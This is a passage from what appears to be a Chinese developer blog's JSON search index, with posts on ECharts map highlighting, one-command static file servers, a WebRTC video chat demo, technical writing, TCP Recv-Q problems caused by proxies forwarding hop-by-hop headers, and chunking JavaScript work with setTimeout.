shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; }, emphasis:{ areaColor: \u0026#39;#3be2fb\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; } } } ] }; // 使用刚指定的配置项和数据显示图表。 myChart.setOption(option); myChart.on(\u0026#39;click\u0026#39;, function(params) { console.log(params); }); setInterval(function(){ var op = myChart.getOption(); var data = op.series[0].data; var length = data.length; data.some(function(item, index){ if(item.selected){ item.selected = false; var next = (index + 1)%length; data[next].selected = true; return true; } }); myChart.setOption(op); }, 3000); 2. 后续补充 我从这里发现:https://github.com/ecomfe/echarts/issues/3282,选中地图的写法是这样的,而试了一下果然可以。主要是type要是mapSelect,而不是geoSelect\nmyChart.dispatchAction({ type: \u0026#39;mapSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 // seriesIndex: 0, // 可选,系列名称,可以是一个数组指定多个系列 // seriesName: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 // dataIndex: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name: \u0026#39;河北\u0026#39; }); 3. 哪里去下载中国地图? 官方示例里是没有中国地图的,不过你可以去github的官方仓库里找。地址是:https://github.com/apache/incubator-echarts/tree/master/map\n4. 地图学习的栗子哪里有? 4.1. 先学习一下美国地图怎么玩吧 echarts官方文档上有美国地图的实例,地址:http://echarts.baidu.com/examples/editor.html?c=map-usa\n4.2. 我国地图也是有的,参考iphone销量这个栗子 地址:http://echarts.baidu.com/option.html#series-map, 注意:地图的相关文档在series-\u0026gt;type:map中\n","permalink":"https://wdd.js.org/posts/2018/02/echarts-highlight-china-map/","summary":"1. 小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我改变了一个方法。这个方法的核心思路是定时获取图标的配置,然后更新配置,最后在设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.","title":"ECharts 轮流高亮中国地图各个省份"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs 2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2018/02/one-command-create-static-file-server/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":" 本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.error(error); } drone.on(\u0026#39;open\u0026#39;, function(error){ if (error) { return console.error(error);} room = drone.subscribe(roomName); room.on(\u0026#39;open\u0026#39;, function(error){ if (error) {onError(error);} }); // 已经链接到房间后,就会收到一个 members 数组,代表房间里的成员 // 这时候信令服务已经就绪 room.on(\u0026#39;members\u0026#39;, function(members){ console.log(\u0026#39;MEMBERS\u0026#39;, members); // 如果你是第二个链接到房间的人,就会创建offer var isOfferer = members.length === 2; startWebRTC(isOfferer); }); }); // 通过Scaledrone发送信令消息 function sendMessage(message) { drone.publish({ room: roomName, message }); } function startWebRTC(isOfferer) { pc = new RTCPeerConnection(configuration); // 当本地ICE Agent需要通过信号服务器发送信息到其他端时 // 会触发icecandidate事件回调 pc.onicecandidate = function(event){ if (event.candidate) { sendMessage({ \u0026#39;candidate\u0026#39;: event.candidate }); } }; // 如果用户是第二个进入的人,就在negotiationneeded 事件后创建sdp if (isOfferer) { // onnegotiationneeded 在要求sesssion协商时发生 pc.onnegotiationneeded = function() { // 创建本地sdp描述 SDP (Session Description Protocol) session描述协议 pc.createOffer().then(localDescCreated).catch(onError); }; } // 当远程数据流到达时,将数据流装载到video中 pc.onaddstream = function(event){ remoteVideo.srcObject = event.stream; }; // 获取本地媒体流 navigator.mediaDevices.getUserMedia({ audio: true, video: true, }).then( function(stream) { // 将本地捕获的视频流装载到本地video中 localVideo.srcObject = stream; // 将本地流加入RTCPeerConnection 实例中 发送到其他端 pc.addStream(stream); }, onError); // 从Scaledrone监听信令数据 room.on(\u0026#39;data\u0026#39;, function(message, client){ // 消息是我自己发送的,则不处理 if (client.id === drone.clientId) { return; } if (message.sdp) { // 设置远程sdp, 在offer 或者 answer后 pc.setRemoteDescription(new RTCSessionDescription(message.sdp), function(){ // 当收到offer 后就接听 if (pc.remoteDescription.type === \u0026#39;offer\u0026#39;) { pc.createAnswer().then(localDescCreated).catch(onError); } }, onError); } else if (message.candidate) { // 增加新的 ICE canidatet 到本地的链接中 pc.addIceCandidate( new RTCIceCandidate(message.candidate), onSuccess, onError ); } }); } function localDescCreated(desc) { pc.setLocalDescription(desc, function(){ sendMessage({ \u0026#39;sdp\u0026#39;: pc.localDescription }); },onError); } 5. WebRTC简介 5.1. 介绍 WebRTC 是一个开源项目,用于Web浏览器之间进行实时音频视频通讯,数据传递。 WebRTC有几个JavaScript APIS。 点击链接去查看demo。\ngetUserMedia(): 捕获音频视频 MediaRecorder: 记录音频视频 RTCPeerConnection: 在用户之间传递音频流和视频流 RTCDataChannel: 在用户之间传递文件流 5.2. 在哪里使用WebRTC? Chrome FireFox Opera Android iOS 5.3. 什么是信令 WebRTC使用RTCPeerConnection在浏览器之间传递流数据, 但是也需要一种机制去协调收发控制信息,这就是信令。信令的方法和协议并不是在WebRTC中明文规定的。 在codelad中用的是Node,也有许多其他的方法。\n5.4. 什么是STUN和TURN和ICE? STUN(Session Traversal Utilities for NAT,NAT会话穿越应用程序)是一种网络协议,它允许位于NAT(或多重NAT)后的客户端找出自己的公网地址,查出自己位于哪种类型的NAT之后以及NAT为某一个本地端口所绑定的Internet端端口。这些信息被用来在两个同时处于NAT路由器之后的主机之间创建UDP通信。该协议由RFC 5389定义。 wikipedia STUN\nTURN(全名Traversal Using Relay NAT, NAT中继穿透),是一种资料传输协议(data-transfer protocol)。允许在TCP或UDP的连线上跨越NAT或防火墙。 TURN是一个client-server协议。TURN的NAT穿透方法与STUN类似,都是通过取得应用层中的公有地址达到NAT穿透。但实现TURN client的终端必须在通讯开始前与TURN server进行交互,并要求TURN server产生\u0026quot;relay port\u0026quot;,也就是relayed-transport-address。这时TURN server会建立peer,即远端端点(remote endpoints),开始进行中继(relay)的动作,TURN client利用relay port将资料传送至peer,再由peer转传到另一方的TURN client。wikipedia TURN\nICE (Interactive Connectivity Establishment,互动式连接建立 ),一种综合性的NAT穿越的技术。 互动式连接建立是由IETF的MMUSIC工作组开发出来的一种framework,可整合各种NAT穿透技术,如STUN、TURN(Traversal Using Relay NAT,中继NAT实现的穿透)、RSIP(Realm Specific IP,特定域IP)等。该framework可以让SIP的客户端利用各种NAT穿透方式打穿远程的防火墙。[wikipedia ICE]\nWebRTC被设计用于点对点之间工作,因此用户可以通过最直接的途径连接。然而,WebRTC的构建是为了应付现实中的网络: 客户端应用程序需要穿越NAT网关和防火墙,并且对等网络需要在直接连接失败的情况下进行回调。 作为这个过程的一部分,WebRTC api使用STUN服务器来获取计算机的IP地址,并将服务器作为中继服务器运行,以防止对等通信失败。(现实世界中的WebRTC更详细地解释了这一点。)\n5.5. WebRTC是否安全? WebRTC组件是强制要求加密的,并且它的JavaScript APIS只能在安全的域下使用(HTTPS 或者 localhost)。信令机制并没有被WebRTC标准定义,所以是否使用安全的协议就取决于你自己了。\n6. WebRTC 参考资料 官网教程\nWebRTC 简单的视频聊天 repo\nWebRTC 教程\nMDN WebRTC API\n谷歌codelab WebRT教程\ngithub上WebRTC各种例子\nsegemntfault上关于WebRTC的教程\n","permalink":"https://wdd.js.org/posts/2018/02/webrtc-tutorial-simple-video-chat/","summary":"本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.","title":"120行代码实现 浏览器WebRTC视频聊天"},{"content":" 本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swgger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5. markdown 工具推荐 蚂蚁笔记 这是我正使用的。 全平台(mac windows ios)有客户端,和浏览器端 笔记可以直接公布为博客 支持独立域名 标签很好用 支持思维导图 支持历史记录 cmd-markdown 有道云笔记 6. 文档之外 公司有个同事,我曾问他使用什么搜索一些技术文档,他说用百度。作为一个翻墙老司机,我惊诧的问他:你为什么不用谷歌去搜索。他说他不会翻墙。我只能呵呵一笑。\n自从有一次搜索:graph for x^8 + y^8,我就决定不再使用百度了。你可以看一下两者的返回结果有什么不同。\n总之:有些鸟儿是关不住的 他们的羽毛太鲜亮了。\n","permalink":"https://wdd.js.org/posts/2018/02/how-to-write-a-technical-document/","summary":"本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swgger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5.","title":"如何写好技术文档?"},{"content":"1. 问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理的转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnetion Keep-Alive Proxy-Authenticate Proxy-Authortization Trailer TE Transfer-Encodeing Upgrade 3. 什么是哑代理? 很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时W eb服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我有发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.headers } var proxy = request(option) req.pipe(proxy) proxy.pipe(res) 4. 解决方案 解决方案有两个, 我推荐使用第二个方案,具体方法参考Express 代理中间件的写法\n更改自己的原有代码 使用成熟的开源产品 5. 参考文献 What is the reason for a high Recv-Q of a TCP connection? TCP buffers keep filling up (Recv-Q full): named unresponsive linux探秘:netstat中Recv-Q 深究 深入剖析 Socket——TCP 通信中由于底层队列填满而造成的死锁问题 netstat Recv-Q和Send-Q 深入剖析 Socket——数据传输的底层实现 Use of Recv-Q and Send-Q 【美】David Gourley / Brian Totty HTTP权威指南 【日】上野宣 于均良 图解HTTP ","permalink":"https://wdd.js.org/posts/2018/02/tcp-high-recv-q-or-send-q-reasons/","summary":"1. 问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理的转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnetion Keep-Alive Proxy-Authenticate Proxy-Authortization Trailer TE Transfer-Encodeing Upgrade 3. 什么是哑代理? 很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时W eb服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我有发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.","title":"哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首"},{"content":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 var everyTimeCreateLines = 80; // 当前行 var currentLine = 0; setTimeout(function renderTable(){ console.time(\u0026#39;wd\u0026#39;); for(var i=currentLine; i\u0026lt;currentLine+everyTimeCreateLines \u0026amp;\u0026amp; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); currentLine = i; if(currentLine \u0026lt; allLines){ setTimeout(renderTable,0); } },0); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 这次异步按批次创建,没有耗时的警告。因为控制了每次代码在50ms内运行。实际上每80行耗时约10ms左右。这就不会引起页面卡顿等问题。\n","permalink":"https://wdd.js.org/posts/2018/02/settimeout-to-splice-big-work/","summary":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; 